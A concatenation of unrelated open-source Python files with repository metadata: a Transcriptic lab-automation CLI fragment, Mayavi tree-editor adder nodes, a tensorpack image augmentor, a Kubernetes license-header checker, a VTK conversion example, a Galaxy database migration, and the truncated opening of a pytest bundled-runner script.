"contain a \"preview\" section")
return
fp.flush()
call(["bash", "-c", command + " " + fp.name])
@cli.command()
@click.argument('file', default='-')
@click.pass_context
def summarize(ctx, file):
with click.open_file(file, 'r') as f:
try:
protocol = json.loads(f.read())
except ValueError:
click.echo("The autoprotocol you're trying to summarize is invalid.")
return
ap2en.AutoprotocolParser(protocol)
@cli.command()
@click.argument('protocol_name')
@click.argument('args', nargs=-1)
def run(protocol_name, args):
'''Run a protocol by passing it a config file (without submitting or analyzing)'''
with click.open_file('manifest.json', 'r') as f:
try:
manifest = json.loads(f.read())
except ValueError:
click.echo("Error: Your manifest.json file is improperly formatted. "
"Please double check your brackets and commas!")
return
try:
p = next(p for p in manifest['protocols'] if p['name'] == protocol_name)
except StopIteration:
click.echo("Error: The protocol name '%s' does not match any protocols "
"that can be previewed from within this directory. \nCheck "
"either your spelling or your manifest.json file and try "
"again." % protocol_name)
return
try:
command = p['command_string']
except KeyError:
click.echo("Error: Your manifest.json file does not have a \"command_string\""
" key.")
return
from subprocess import call
call(["bash", "-c", command + " " + ' '.join(args)])
@cli.command()
@click.option('--api-root', default='https://secure.transcriptic.com')
@click.pass_context
def login(ctx, api_root):
'''Log in to your Transcriptic account'''
email = click.prompt('Email')
password = click.prompt('Password', hide_input=True)
r = requests.post(
"%s/users/sign_in" % api_root,
data=json.dumps({
'user': {
'email': email,
'password': password,
},
}),
headers={
'Accept': 'application/json',
'Content-Type': 'application/json',
})
if r.status_code != 200:
click.echo("Error logging into Transcriptic: %s" % r.json()['error'])
sys.exit(1)
user = r.json()
token = (
user.get('authentication_token') or
user['test_mode_authentication_token']
)
if len(user['organizations']) < 1:
click.echo("Error: You don't appear to belong to any organizations. \nVisit %s "
"and create an organization." % api_root)
sys.exit(1)
if len(user['organizations']) == 1:
organization = user['organizations'][0]['subdomain']
else:
click.echo("You belong to %s organizations:" %
len(user['organizations']))
for o in user['organizations']:
click.echo(" %s (%s)" % (o['name'], o['subdomain']))
organization = click.prompt(
'Which would you like to login as',
default=user['organizations'][0]['subdomain'],
prompt_suffix='? ')
r = requests.get('%s/%s' % (api_root, organization), headers={
'X-User-Email': email,
'X-User-Token': token,
'Accept': 'application/json',
})
if r.status_code != 200:
click.echo("Error accessing organization: %s" % r.text)
sys.exit(1)
ctx.obj = Config(api_root, email, token, organization)
ctx.obj.save(ctx.parent.params['config'])
click.echo('Logged in as %s (%s)' % (user['email'], organization))
@click.pass_context
def get_project_id(ctx, name):
projs = ctx.invoke(projects, i=True)
id = projs.get(name.lower())
if not id:
id = name if name in projs.values() else None
if not id:
click.echo("A project with the name or id '%s' was not found in your "
"organization." % name)
return
return id
@click.pass_context
def get_package_id(ctx, name):
package_names = ctx.invoke(packages, i=True)
package_names = {k.lower(): v for k,v in package_names.items()}
package_id = package_names.get(name)
if not package_id:
package_id = name if name in package_names.values() else None
if not package_id and __name__ == "__main__":
click.echo("The package %s does not exist in your organization." % name)
return
return package_id
@click.pass_context
def get_package_name(ctx, id):
package_names = {v: k for k, v in ctx.invoke(packages, i=True).items()}
package_name = package_names.get(id)
if not package_name:
package_name = id if id in package_names.values() else None
if not package_name and __name__ == "__main__":
click.echo("The id %s does not match any package in your organization."
% id)
return
return package_name
def parse_json(json_file):
try:
return json.load(open(json_file))
except ValueError as e:
click.echo('Invalid json: %s' % e)
return None
def get_protocol_list(json_file):
manifest = parse_json(json_file)
protocol_list = [p['name'] for p in manifest['protocols']]
return protocol_list
def pull(nested_dict):
if "type" in nested_dict and "inputs" not in nested_dict:
return nested_dict
else:
inputs = {}
if "type" in nested_dict and "inputs" in nested_dict:
for param, input in nested_dict["inputs"].items():
inputs[str(param)] = pull(input)
return inputs
else:
return nested_dict
def regex_manifest(protocol, input):
'''Special input types, gets updated as more input types are added'''
if "type" in input and input["type"] == "choice":
if "options" in input:
pattern = '\[(.*?)\]'
match = re.search(pattern, str(input["options"]))
if not match:
click.echo("Error in %s: input type \"choice\" options must be in the "
"form of: \n[\n {\n \"value\": <choice value>, \n \"label\": "
"<choice label>\n },\n ...\n]" % protocol['name'])
raise RuntimeError
else:
click.echo("Must have options for 'choice' input type." +
" Error in: " + protocol["name"])
raise RuntimeError
def iter_json(manifest):
all_types = {}
try:
protocol = manifest['protocols']
except TypeError:
click.echo("Error: Your manifest.json file doesn't contain valid JSON and"
" cannot be formatted.")
raise RuntimeError
for protocol in manifest["protocols"]:
types = {}
for param, input in protocol["inputs"].items():
types[param] = pull(input)
if isinstance(input, dict):
if input["type"] == "group" or input["type"] == "group+":
for i, j in input.items():
if isinstance(j, dict):
for k, l in j.items():
regex_manifest(protocol, l)
else:
regex_manifest(protocol, input)
all_types[protocol["name"]] = types
return all_types
@cli.command()
@click.argument('manifest', default='manifest.json')
def format(manifest):
'''Check autoprotocol format of manifest.json'''
manifest = parse_json(manifest)
try:
iter_json(manifest)
click.echo("No manifest formatting errors found.")
except RuntimeError:
pass
|
therzka/runner
|
transcriptic.py
|
Python
|
bsd-3-clause
| 25,847
|
[
"VisIt"
] |
4c5692012271afd3bf035e5a19d6b2eafc0f3b84fcf477bcdb717c14d8380d38
|
"""
Custom nodes for a Tree Editor that provide views for adding various nodes
to the tree.
"""
# Authors: Judah De Paula <judah@enthought.com>
# Prabhu Ramachandran <prabhu_r@users.sf.net>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import (HasTraits, Str, Property, Any, Button,
List, Instance, provides,
ToolbarButton)
from traitsui.api import View, Item, Group,\
TextEditor, TreeEditor, TreeNode, ListEditor, ITreeNode
from pyface.api import ImageResource
from pyface.resource.api import resource_path
# Local imports.
from .registry import registry
###############################################################################
# AdderNode class
###############################################################################
@provides(ITreeNode)
class AdderNode(TreeNode):
""" Base class that will display a TreeNode to add items to the tree.
"""
# String to be shown in the TreeEditor.
label = Str('Base AdderNode')
# Default tooltip for this class.
tooltip = Str('Add an item')
# The parent object that should be manipulated for adding children.
object = Any
# Duck-typing is necessary since Mayavi assumes nodes always have scenes.
scene = Property
# Trait view to show in the Mayavi current object panel.
view = View(Group(label='AdderNode'))
def dialog_view(self):
""" View shown by double-clicking on the node. Same as in Base().
"""
view = self.trait_view()
view.buttons = [ ]
view.title = self.label
view.icon = ImageResource('add.ico')
view.resizable = True
view.width = 350
view.height = 650
return view
def _get_scene(self):
""" Trait Property getter for 'scene'.
"""
object = self.object
if isinstance(object, AdderNode):
return None
if object is not None:
return object.scene
else:
return None
#------------------------------------------------------------------------
# The ITreeNode interface needed by the Qt tree_editor
#------------------------------------------------------------------------
def get_label(self):
return self.label
def get_icon(self, obj, is_expanded=False):
return self.icon_name
def get_icon_path(self):
return resource_path()
def get_tooltip(self):
return self.tooltip
def allows_children(self):
return False
def get_children_id(self, node=None):
return []
def when_label_changed(self, label_updated, remove):
return
def when_column_labels_change(self, listener, remove):
return
###############################################################################
# SceneAdderNode class
###############################################################################
class SceneAdderNode(AdderNode):
""" Subclass for adding Scene nodes to a Mayavi Engine node.
"""
# String to be shown in the TreeEditor.
label = Str('Add a new scene')
# The name of the icon
icon_name = Str('add_scene.png')
# Button for the View.
add_scene = Button('Add a new scene',
image=ImageResource('add_scene.png'))
# Trait view to show in the Mayavi current object panel.
view = View(Group(Item('add_scene', show_label=False, style='custom'),
label='Add a scene'))
def _add_scene_fired(self):
""" Trait handler for when the add_scene button is clicked.
"""
self.object.new_scene()
###############################################################################
# DocumentedItem class
###############################################################################
class DocumentedItem(HasTraits):
""" Container to hold a name and a documentation for an action.
"""
# Name of the action
name = Str
# Button to trigger the action
add = ToolbarButton('Add', orientation='horizontal',
image=ImageResource('add.ico'))
# Object the action will apply on
object = Any
# Two lines documentation for the action
documentation = Str
view = View('_',
Item('add', style='custom', show_label=False),
Item('documentation', style='readonly',
editor=TextEditor(multi_line=True),
resizable=True,
show_label=False),
)
def _add_fired(self):
""" Trait handler for when the add_source button is clicked in
one of the sub objects in the list.
"""
action = getattr(self.object.menu_helper, self.id)
action()
def documented_item_factory(name='', documentation='',
id='', object=None):
""" Factory for creating a DocumentedItem with the right button
label.
"""
documentation = documentation.replace('\n', '')
documentation = documentation.replace(' ', '')
class MyDocumentedItem(DocumentedItem):
add = ToolbarButton('%s' % name, orientation='horizontal',
image=ImageResource('add.ico'))
return MyDocumentedItem(
name=name,
documentation=documentation,
id=id,
object=object)
###############################################################################
# ListAdderNode class
###############################################################################
class ListAdderNode(AdderNode):
""" A node for adding object, with a list of objects to add generated
from the registry.
"""
# The list of items to display to the user.
items_list = List(DocumentedItem)
# A reference to the registry, to generate this list.
items_list_source = List()
# Selected item
selected_item = Instance(DocumentedItem)
# A reference to self, to allow to build the tree view.
self = Instance(AdderNode)
# The icon of the displayed objects
icon_name = Str('add.ico')
def _self_default(self):
return self
def default_traits_view(self):
nodes = [TreeNode(node_for=[AdderNode],
label='name',
copy=False,
delete=False,
rename=False,
children='items_list',
),
TreeNode(node_for=[DocumentedItem],
label='name',
copy=False,
delete=False,
rename=False,
icon_item=self.icon_name,
),
]
tree_editor = TreeEditor(editable=False,
hide_root=True,
orientation='vertical',
selected='object.selected_item',
nodes=nodes,
on_dclick='object._on_tree_dclick',
)
view = View(Item('self',
show_label=False,
editor=tree_editor,
resizable=True,
springy=True,
height=0.5),
Item('selected_item', style='custom', show_label=False,
height=0.5),
resizable=True)
return view
def _object_changed(self, value):
""" Trait handler for when the self.object trait changes.
"""
result = []
if value is not None:
# Don't need 'x', but do need to generate the actions.
x = value.menu_helper.actions
for src in self.items_list_source:
if not self._is_action_suitable(value, src):
continue
name = src.menu_name.replace('&','')
result.append(
documented_item_factory(
name=name,
documentation=src.help,
id=src.id,
object=value)
)
self.items_list = result
def _is_action_suitable(self, object, src):
""" Check that the action described by src can be applied on the
given object.
"""
if hasattr(object.menu_helper, 'check_%s' % src.id) \
and getattr(object.menu_helper, 'check_%s' % src.id)():
return True
else:
return False
def _on_tree_dclick(self, object):
""" Called when an user double clicks on an item in the tree
view.
"""
object._add_fired()
###############################################################################
# SourceAdderNode class
###############################################################################
class SourceAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add a scene source.
"""
# Button for adding a data file, with automatic format checking.
open_file = ToolbarButton('Load data from file',
orientation='horizontal',
image=ImageResource('file.png'))
# A reference to the registry, to generate this list.
items_list_source = [source for source in registry.sources
if len(source.extensions) == 0]
# The string to display on the icon in the TreeEditor.
label = 'Add Data Source'
# The icon of the displayed objects
icon_name = Str('source.ico')
# Trait view to show in the Mayavi current object panel.
def default_traits_view(self):
return View(Group(Group(Item('open_file', style='custom'),
show_labels=False, show_border=False),
Item('items_list', style='readonly',
editor=ListEditor(style='custom')),
show_labels=False,
label='Add a data source'))
def _open_file_fired(self):
""" Trait handler for when the open_file button is clicked.
"""
self.object.menu_helper.open_file_action()
def _is_action_suitable(self, object, src):
return True
###############################################################################
# ModuleAdderNode class
###############################################################################
class ModuleAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add modules.
"""
# String to be shown in the TreeEditor.
label = Str('Add a visualization module')
# The icon of the displayed objects
icon_name = Str('module.ico')
# A reference to the registry, to generate this list.
items_list_source = registry.modules
def _object_changed(self, value):
if value is not None:
value.menu_helper._build_filter_actions()
ListAdderNode._object_changed(self, value)
###############################################################################
# FilterAdderNode class
###############################################################################
class FilterAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add filters.
"""
# String to be shown in the TreeEditor.
label = Str('Add a processing filter')
# The icon of the displayed objects
icon_name = Str('filter.ico')
# A reference to the registry, to generate this list.
items_list_source = registry.filters
###############################################################################
# ModuleFilterAdderNode class
###############################################################################
class ModuleFilterAdderNode(AdderNode):
""" Tree node that presents a view to the user to add filter and
modules.
"""
# The string to display on the icon in the TreeEditor.
label = 'Add module or filter'
# An adder node for modules
modules = Instance(ModuleAdderNode, ())
# An adder node for filters
filters = Instance(FilterAdderNode, ())
def _object_changed(self):
""" Propagate the object to the sub nodes.
"""
self.filters.object = self.object
self.modules.object = self.object
# Trait view to show in the Mayavi current object panel.
view = View(
Group(Item('modules', style='custom', springy=True,
resizable=True,
height=1.,
),
show_labels=False,
label='Visualization modules'),
Group(Item('filters', style='custom', springy=True,
resizable=True,
height=1.,
),
show_labels=False,
label='Processing filters'),
)
### EOF #######################################################################
|
dmsurti/mayavi
|
mayavi/core/adder_node.py
|
Python
|
bsd-3-clause
| 13,361
|
[
"Mayavi"
] |
cbe6ddb9edc3db4f2421570ba4d0bf8d065a775c7bec67cbba1cc54592d82a69
|
# -*- coding: utf-8 -*-
# File: deform.py
from .base import ImageAugmentor
from ...utils import logger
import numpy as np
__all__ = []
# Code was temporarily kept here for a future reference in case someone needs it
# But it was already deprecated,
# because this augmentation is not a general one that people will often find helpful.
class GaussianMap(object):
""" Generate Gaussian weighted deformation map"""
# TODO really needs speedup
def __init__(self, image_shape, sigma=0.5):
assert len(image_shape) == 2
self.shape = image_shape
self.sigma = sigma
def get_gaussian_weight(self, anchor):
"""
Args:
anchor: coordinate of the center
"""
ret = np.zeros(self.shape, dtype='float32')
y, x = np.mgrid[:self.shape[0], :self.shape[1]]
y = y.astype('float32') / ret.shape[0] - anchor[0]
x = x.astype('float32') / ret.shape[1] - anchor[1]
g = np.exp(-(x**2 + y ** 2) / self.sigma)
# cv2.imshow(" ", g)
# cv2.waitKey()
return g
def np_sample(img, coords):
# a numpy implementation of ImageSample layer
coords = np.maximum(coords, 0)
coords = np.minimum(coords, np.array([img.shape[0] - 1, img.shape[1] - 1]))
lcoor = np.floor(coords).astype('int32')
ucoor = lcoor + 1
ucoor = np.minimum(ucoor, np.array([img.shape[0] - 1, img.shape[1] - 1]))
diff = coords - lcoor
neg_diff = 1.0 - diff
lcoory, lcoorx = np.split(lcoor, 2, axis=2)
ucoory, ucoorx = np.split(ucoor, 2, axis=2)
diff = np.repeat(diff, 3, 2).reshape((diff.shape[0], diff.shape[1], 2, 3))
neg_diff = np.repeat(neg_diff, 3, 2).reshape((diff.shape[0], diff.shape[1], 2, 3))
diffy, diffx = np.split(diff, 2, axis=2)
ndiffy, ndiffx = np.split(neg_diff, 2, axis=2)
ret = img[lcoory, lcoorx, :] * ndiffx * ndiffy + \
img[ucoory, ucoorx, :] * diffx * diffy + \
img[lcoory, ucoorx, :] * ndiffy * diffx + \
img[ucoory, lcoorx, :] * diffy * ndiffx
return ret[:, :, 0, :]
class GaussianDeform(ImageAugmentor):
"""
Some kind of slow deformation I made up. Don't count on it.
"""
# TODO input/output with different shape
def __init__(self, anchors, shape, sigma=0.5, randrange=None):
"""
Args:
anchors (list): list of center coordinates in range [0,1].
shape(list or tuple): image shape in [h, w].
sigma (float): sigma for Gaussian weight
randrange (int): offset range. Defaults to shape[0] / 8
"""
logger.warn("GaussianDeform is slow. Consider using it with 4 or more prefetching processes.")
super(GaussianDeform, self).__init__()
self.anchors = anchors
self.K = len(self.anchors)
self.shape = shape
self.grid = np.mgrid[0:self.shape[0], 0:self.shape[1]].transpose(1, 2, 0)
self.grid = self.grid.astype('float32') # HxWx2
gm = GaussianMap(self.shape, sigma=sigma)
self.gws = np.array([gm.get_gaussian_weight(ank)
for ank in self.anchors], dtype='float32') # KxHxW
self.gws = self.gws.transpose(1, 2, 0) # HxWxK
if randrange is None:
self.randrange = self.shape[0] / 8
else:
self.randrange = randrange
self.sigma = sigma
def _get_augment_params(self, img):
v = self.rng.rand(self.K, 2).astype('float32') - 0.5
v = v * 2 * self.randrange
return v
def _augment(self, img, v):
grid = self.grid + np.dot(self.gws, v)
return np_sample(img, grid)
def _augment_coords(self, coords, param):
raise NotImplementedError()
|
eyaler/tensorpack
|
tensorpack/dataflow/imgaug/deform.py
|
Python
|
apache-2.0
| 3,718
|
[
"Gaussian"
] |
b0aeda6dd9d36cf53cdc168386bd109dca80677ef63e97d955a479253a501692
|
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import difflib
import glob
import json
import mmap
import os
import re
import sys
parser = argparse.ArgumentParser()
parser.add_argument(
"filenames",
help="list of files to check, all files if unspecified",
nargs='*')
# Rootdir defaults to the directory **above** the repo-infra dir.
rootdir = os.path.dirname(__file__) + "/../../../"
rootdir = os.path.abspath(rootdir)
parser.add_argument(
"--rootdir", default=rootdir, help="root directory to examine")
default_boilerplate_dir = os.path.join(rootdir, "cluster-capacity/verify/boilerplate")
parser.add_argument(
"--boilerplate-dir", default=default_boilerplate_dir)
parser.add_argument(
"-v", "--verbose",
help="give verbose output regarding why a file does not pass",
action="store_true")
args = parser.parse_args()
verbose_out = sys.stderr if args.verbose else open("/dev/null", "w")
def get_refs():
refs = {}
for path in glob.glob(os.path.join(args.boilerplate_dir, "boilerplate.*.txt")):
extension = os.path.basename(path).split(".")[1]
ref_file = open(path, 'r')
ref = ref_file.read().splitlines()
ref_file.close()
refs[extension] = ref
return refs
def file_passes(filename, refs, regexs):
try:
f = open(filename, 'r')
except Exception as exc:
print("Unable to open %s: %s" % (filename, exc), file=verbose_out)
return False
data = f.read()
f.close()
basename = os.path.basename(filename)
extension = file_extension(filename)
if extension != "":
ref = refs[extension]
else:
ref = refs[basename]
# remove build tags from the top of Go files
if extension == "go":
p = regexs["go_build_constraints"]
(data, found) = p.subn("", data, 1)
# remove shebang from the top of shell files
if extension == "sh" or extension == "py":
p = regexs["shebang"]
(data, found) = p.subn("", data, 1)
data = data.splitlines()
# if our test file is smaller than the reference it surely fails!
if len(ref) > len(data):
print('File %s smaller than reference (%d < %d)' %
(filename, len(data), len(ref)),
file=verbose_out)
return False
# trim our file to the same number of lines as the reference file
data = data[:len(ref)]
p = regexs["year"]
for d in data:
if p.search(d):
print('File %s is missing the year' % filename, file=verbose_out)
return False
# Replace all occurrences of the regex "2016|2015|2014" with "YEAR"
p = regexs["date"]
for i, d in enumerate(data):
(data[i], found) = p.subn('YEAR', d)
if found != 0:
break
# if we don't match the reference at this point, fail
if ref != data:
print("Header in %s does not match reference, diff:" % filename, file=verbose_out)
if args.verbose:
print(file=verbose_out)
for line in difflib.unified_diff(ref, data, 'reference', filename, lineterm=''):
print(line, file=verbose_out)
print(file=verbose_out)
return False
return True
def file_extension(filename):
return os.path.splitext(filename)[1].split(".")[-1].lower()
skipped_dirs = ['Godeps', 'third_party', '_gopath', '_output', '.git',
'cluster/env.sh', 'vendor', 'test/e2e/generated/bindata.go',
'cluster-capacity/verify/boilerplate/test', '.glide']
def normalize_files(files):
newfiles = []
for pathname in files:
if any(x in pathname for x in skipped_dirs):
continue
newfiles.append(pathname)
for i, pathname in enumerate(newfiles):
if not os.path.isabs(pathname):
newfiles[i] = os.path.join(args.rootdir, pathname)
return newfiles
def get_files(extensions):
files = []
if len(args.filenames) > 0:
files = args.filenames
else:
for root, dirs, walkfiles in os.walk(args.rootdir):
# don't visit certain dirs. This is just a performance improvement
# as we would prune these later in normalize_files(). But doing it
# cuts down the amount of filesystem walking we do and cuts down
# the size of the file list
for d in skipped_dirs:
if d in dirs:
dirs.remove(d)
for name in walkfiles:
pathname = os.path.join(root, name)
files.append(pathname)
files = normalize_files(files)
outfiles = []
for pathname in files:
basename = os.path.basename(pathname)
extension = file_extension(pathname)
if extension in extensions or basename in extensions:
outfiles.append(pathname)
return outfiles
def get_regexs():
regexs = {}
# Search for "YEAR" which exists in the boilerplate, but shouldn't in the real thing
regexs["year"] = re.compile( 'YEAR' )
# dates can be 2014, 2015 or 2016, company holder names can be anything
regexs["date"] = re.compile( '(2014|2015|2016|2017)' )
# strip // +build \n\n build constraints
regexs["go_build_constraints"] = re.compile(r"^(// \+build.*\n)+\n", re.MULTILINE)
# strip #!.* from shell scripts
regexs["shebang"] = re.compile(r"^(#!.*\n)\n*", re.MULTILINE)
return regexs
def main():
regexs = get_regexs()
refs = get_refs()
filenames = get_files(refs.keys())
for filename in filenames:
if not file_passes(filename, refs, regexs):
print(filename, file=sys.stdout)
return 0
if __name__ == "__main__":
sys.exit(main())
|
hodovska/cluster-capacity
|
verify/boilerplate/boilerplate.py
|
Python
|
apache-2.0
| 6,314
|
[
"VisIt"
] |
70b61e53977c7cf756f769d0c7dd9c140b3270b260bd338cdfbefc1fbf5cdc22
|
# -*- coding: utf-8 -*-
import os
import swc2vtk
import swcfilelist
# input_dir = '/home/nebula/git/LAL-VPCmapping/converted_swc'
input_dir = './swc'
output_dir = '/home/nebula/work/paraview/standardbrain20170131/'
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
filelist = swcfilelist.filelist_lalvpc
vtkgen = swc2vtk.VtkGenerator()
for filename in filelist:
vtkgen.add_swc(os.path.join(input_dir, filename + '.swc'))
vtkgen.add_swc(os.path.join(input_dir, filename + '.swc'), inv_x=True, shift_x=1024.0)
vtkgen.write_vtk(os.path.join(output_dir, 'all.vtk'), coloring=True, normalize_diam=True, radius_data=True)
|
DaisukeMiyamoto/swc2vtk
|
examples/append_allswc.py
|
Python
|
apache-2.0
| 639
|
[
"ParaView",
"VTK"
] |
bacc18099410147c56346216fddaba36a98d91c1b2744e210393b547f18fb5da
|
"""
Migration script to create the tool_version and tool_version_association tables and drop the tool_id_guid_map table.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import datetime
now = datetime.datetime.utcnow
# Need our custom types, but don't import anything else from model
from galaxy.model.custom_types import *
from galaxy.model.custom_types import _sniffnfix_pg9_hex
from galaxy.util.json import loads, dumps
import sys, logging
log = logging.getLogger( __name__ )
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler( sys.stdout )
format = "%(name)s %(levelname)s %(asctime)s %(message)s"
formatter = logging.Formatter( format )
handler.setFormatter( formatter )
log.addHandler( handler )
metadata = MetaData()
#migrate_engine = scoped_session( sessionmaker( bind=migrate_engine, autoflush=False, autocommit=True ) )
def nextval( table, col='id' ):
if migrate_engine.name == 'postgres':
return "nextval('%s_%s_seq')" % ( table, col )
elif migrate_engine.name == 'mysql' or migrate_engine.name == 'sqlite':
return "null"
else:
raise Exception( 'Unable to convert data for unknown database type: %s' % migrate_engine.name )
def localtimestamp():
if migrate_engine.name == 'postgres' or migrate_engine.name == 'mysql':
return "LOCALTIMESTAMP"
elif migrate_engine.name == 'sqlite':
return "current_date || ' ' || current_time"
else:
raise Exception( 'Unable to convert data for unknown database type: %s' % db )
ToolVersion_table = Table( "tool_version", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "tool_id", String( 255 ) ),
Column( "tool_shed_repository_id", Integer, ForeignKey( "tool_shed_repository.id" ), index=True, nullable=True ) )
ToolVersionAssociation_table = Table( "tool_version_association", metadata,
Column( "id", Integer, primary_key=True ),
Column( "tool_id", Integer, ForeignKey( "tool_version.id" ), index=True, nullable=False ),
Column( "parent_id", Integer, ForeignKey( "tool_version.id" ), index=True, nullable=False ) )
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print __doc__
ToolIdGuidMap_table = Table( "tool_id_guid_map", metadata, autoload=True )
metadata.reflect()
# Create the tables.
try:
ToolVersion_table.create()
except Exception, e:
log.debug( "Creating tool_version table failed: %s" % str( e ) )
try:
ToolVersionAssociation_table.create()
except Exception, e:
log.debug( "Creating tool_version_association table failed: %s" % str( e ) )
# Populate the tool table with tools included in installed tool shed repositories.
cmd = "SELECT id, metadata FROM tool_shed_repository"
result = migrate_engine.execute( cmd )
count = 0
for row in result:
if row[1]:
tool_shed_repository_id = row[0]
repository_metadata = loads( _sniffnfix_pg9_hex( str( row[1] ) ) )
# Create a new row in the tool table for each tool included in repository. We will NOT
# handle tool_version_associaions because we do not have the information we need to do so.
tools = repository_metadata.get( 'tools', [] )
for tool_dict in tools:
cmd = "INSERT INTO tool_version VALUES (%s, %s, %s, '%s', %s)" % \
( nextval( 'tool_version' ), localtimestamp(), localtimestamp(), tool_dict[ 'guid' ], tool_shed_repository_id )
migrate_engine.execute( cmd )
count += 1
print "Added %d rows to the new tool_version table." % count
# Drop the tool_id_guid_map table since the 2 new tables render it unnecessary.
try:
ToolIdGuidMap_table.drop()
except Exception, e:
log.debug( "Dropping tool_id_guid_map table failed: %s" % str( e ) )
def downgrade(migrate_engine):
metadata.bind = migrate_engine
ToolIdGuidMap_table = Table( "tool_id_guid_map", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "tool_id", String( 255 ) ),
Column( "tool_version", TEXT ),
Column( "tool_shed", TrimmedString( 255 ) ),
Column( "repository_owner", TrimmedString( 255 ) ),
Column( "repository_name", TrimmedString( 255 ) ),
Column( "guid", TEXT, index=True, unique=True ) )
metadata.reflect()
try:
ToolVersionAssociation_table.drop()
except Exception, e:
log.debug( "Dropping tool_version_association table failed: %s" % str( e ) )
try:
ToolVersion_table.drop()
except Exception, e:
log.debug( "Dropping tool_version table failed: %s" % str( e ) )
try:
ToolIdGuidMap_table.create()
except Exception, e:
log.debug( "Creating tool_id_guid_map table failed: %s" % str( e ) )
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/lib/galaxy/model/migrate/versions/0091_add_tool_version_tables.py
|
Python
|
gpl-3.0
| 5,125
|
[
"Galaxy"
] |
99e9ad15c6dc830ec3bba8964bf554de1faf2b2fff3432dba6a496ae50a5294b
|
#! /usr/bin/env python
# Hi There!
# You may be wondering what this giant blob of binary data here is, you might
# even be worried that we're up to something nefarious (good for you for being
# paranoid!). This is a base64 encoding of a zip file, this zip file contains
# a fully functional basic pytest script.
#
# Pytest is a thing that tests packages, pytest itself is a package that some-
# one might want to install, especially if they're looking to run tests inside
# some package they want to install. Pytest has a lot of code to collect and
# execute tests, and other such sort of "tribal knowledge" that has been en-
# coded in its code base. Because of this we basically include a basic copy
# of pytest inside this blob. We do this because it let's you as a maintainer
# or application developer who wants people who don't deal with python much to
# easily run tests without installing the complete pytest package.
#
# If you're wondering how this is created: you can create it yourself if you
# have a complete pytest installation by using this command on the command-
# line: ``py.test --genscript=runtests.py``.
sources = """
eNrsvWuXG0lyKLb3+nEt2LrSta/9zce1oFtVRaLBJnckrXAHs+JyyBWl3Zk5JEc7Or19wWqgurum
C1VgVYHd7dX6+Kt/hX+Ef4R/i/+F45XPygLQnMdK53ikZXcDmZGZkZGREZHx+D/+7R/e/yT5+s83
d9NFWV9OF4uiKrrF4v2/+frvx+NxBJ9dFtVl9OyrV1ESb5p6tV3mTRtHWbWK4mVdtds1/Q2/Vvmy
y1fRhyKLrvO7m7pZtWkEQEaj9//263+HI7Td6v1/8fb/+jc/+Umx3tRNF7V37Wi0LLO2jd50q6Q+
/xZgpLNRBP/h8OvsOm+jrt4cl/mHvIw2d91VXUVrmEYJX2QfsqLMzss8yuCPKsq6rinOt10+IQj4
Hw+ES+iu8nUEnS+Kpu2ibLnM23aqRhrRL6v8IlIYSNq8vJCp4H/4J6BnVSzhy2iOU5/KPOzOl3mH
s5D+k6jK1rkFpWvuzB/43xpAwZA0S+hEzXWD/HaZb7roFX37omnqxu3cZEWbR8/UqqlFMgZMA6Jn
sCXbchVVdSdIiI7acXQUuUM0ebdtAKOjEfSBueA2pKP3/+XXf4obtqxX+RT/ef9fvf2Ta71tm7uR
tYEXTb2OiqrdwN6poZ5/ufjHZ6+fvf7Vm4n8/g8v/um3X77+/M1odL4tStiRRZNvGhgRf4xG+G9Z
nMPfMK60mC4AXQwwibFBPIliaRino1FxQbvwAQiwqCvYt4v69OQs+mwe/YzxRDPrmmyZn2fLazW3
i7pZZ92CkYsd66q8G+Vlm1u99OoXm7unB4IQSn4O3fqkfNNkm03eRFlTb+HsfMWUjENE3LYlOgyS
4QR2+gabWpQEi8etvcpapLdEGkyi8bJeXBRljts8Tn16oUaMZFodkKt8qCCkw7RKR0DBxp3jHlNr
xFB7OG5lUeVV7XcxXxxHT/o9+6M4I8jhcKk/dD7e3m3U0UCMZTbSZ9FRA4dCoy9N3QMPn5sp2Oc8
f6/3pgbO0liYliNl+s+5Cf5hg6jyfSBwuthAg+Dufwt8GEipu9PANll35TMsJDqBk1EDWXK0qYuK
OWIdtfW2WeaMkQSGy4FNZnCKOw1mXVxedTQT6oedkNMuu21WlnewC0VLwJAC0qmmYfxvw4SGY0/L
epmVicKJTTIG4w+A39+d59GqruIOyQ8mU7TR8ipfXsMQPulvpvRN4hH5g+ibb74RSAjjKmtWcO7K
4hoXl0c3edGs8GIrll6/oqIGbQeXW4ZtgB+dIoUuMxhput2sso5/P4M55u0vnP642tD6/E3dDG3i
xbYseT92b6Uc3Te8dbKpwJFo8ghE7SrOIKov6HOiXwue/t3hdoq/MQDTBoBOIrr16As41NXKmiou
uXelYCdD7t95YdahjVu1QmK7oVU90KfQNBRQQN6bDNYIiHGQorbHmYW1PL0UvOKby1aO7oesmb/M
4PIYWla33cA23BRwAHEd0BVEJjhISBttaHkjh6yA2GMYI47gJLR5F71ttgAECEWNgL0Zlmw1tC5Y
KKpWDiiRyvQU2ujmKocVN3kLfw3g8QqgMFFdAWUst7wjgAM69YiIkXW9WGdAfwxtQBSBFRMjxaOh
PrFPNMzaPce62yPd76LMLtvoLyzp4n49tAzi7bk0hikQIk9nCtKZutNfNvBF71L/rXunZ+pWv8DW
0VVdrogzLoj5tSQzXywuy/oc/iIYwHFurorlFbBR3AUUY4DfAX8F3pV/yMotMJzVdFg+nfBQvpiq
